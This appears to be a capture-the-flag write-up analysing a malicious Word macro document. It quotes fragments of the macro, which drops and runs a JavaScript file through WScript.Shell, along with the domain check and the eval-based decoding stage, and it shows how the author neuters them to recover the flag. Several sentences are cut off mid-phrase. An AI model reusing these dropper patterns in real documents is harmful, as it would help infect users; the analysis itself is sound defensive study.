We start by downloading the source files.
The zip file contains a Word document named
olevba invitation.docm --deobf
<snip>
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|AutoExec |AutoClose |Runs when the Word document is closed |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Open |May open a file |
|Suspicious|Put |May write to a file (if combined with Open) |
|Suspicious|Binary |May read or write a binary file (if combined |
| | |with Open) |
|Suspicious|Kill |May delete a file |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|Run |May run an executable file or a system |
| | |command |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Windows |May enumerate application windows (if |
| | |combined with Shell.Application object) |
|Suspicious|Xor |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|VBA obfuscated |VBA string expressions were detected, may be |
| |Strings |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |mailform.js |Executable file name |
|VBA string|%appdata%\Microsoft\|Environ("appdata") & "\Microsoft\Windows" |
| |Windows | |
|VBA string|%appdata% |Environ("appdata") |
|VBA string|\mailform.js |"\" & "mailform.js" |
|VBA string|" |"""" + " vF8rdgMHKBrvCoCp0ulm" |
| |vF8rdgMHKBrvCoCp0ulm| |
+----------+--------------------+---------------------------------------------+
This output shows that the document contains macros that are likely to be malicious. The
Looking at the macros we see that some things happen on
Reading the code we figure out that it creates a file in the
We create a new Word document and open the VBA editor (you need to enable the Developer tab in your ribbon). We copy the macros from the
Then we find the line that runs a shell command. We don't want to run this command, so we remove the line.
Set SHELL_OBJECT = CreateObject("WScript.Shell")
SHELL_OBJECT.Run """" + VIRUS_PATH + """" + " vF8rdgMHKBrvCoCp0ulm"
If we look closely we can find a check for a specific domain. To run this locally we need to remove the check for the domain.
chkDomain = "GAMEMASTERS.local"
strUserDomain = Environ$("UserDomain")
If chkDomain <> strUserDomain Then
Else
Because we are not running the macros on the correct document we need to change
Now we can run the
Unfortunately, the
The first line reads the argument. We can hardcode the argument to
var lVky = WScript.Arguments;
var lVky = "vF8rdgMHKBrvCoCp0ulm";
Looking further we see that the script calculates some variables and then calls
Iwlh = xR68(DASz, Iwlh);
eval(Iwlh);
Iwlh = xR68(DASz, Iwlh);
console.log(Iwlh);
Now we can run the script and see what it tries to execute. This gives us a new script. You can download the script here.
Looking at this script with jsnice we find a cookie named
S47T.SETREQUESTHEADER("Cookie:","flag=SFRCe200bGQwY3NfNHIzX2czdHQxbmdfVHIxY2tpMTNyfQo=");
This looks like a base64 encoded string. We can decode it to get the flag.
base64 -d
SFRCe200bGQwY3NfNHIzX2czdHQxbmdfVHIxY2tpMTNyfQo=
HTB{m4ld0cs_4r3_g3tt1ng_Tr1cki13r}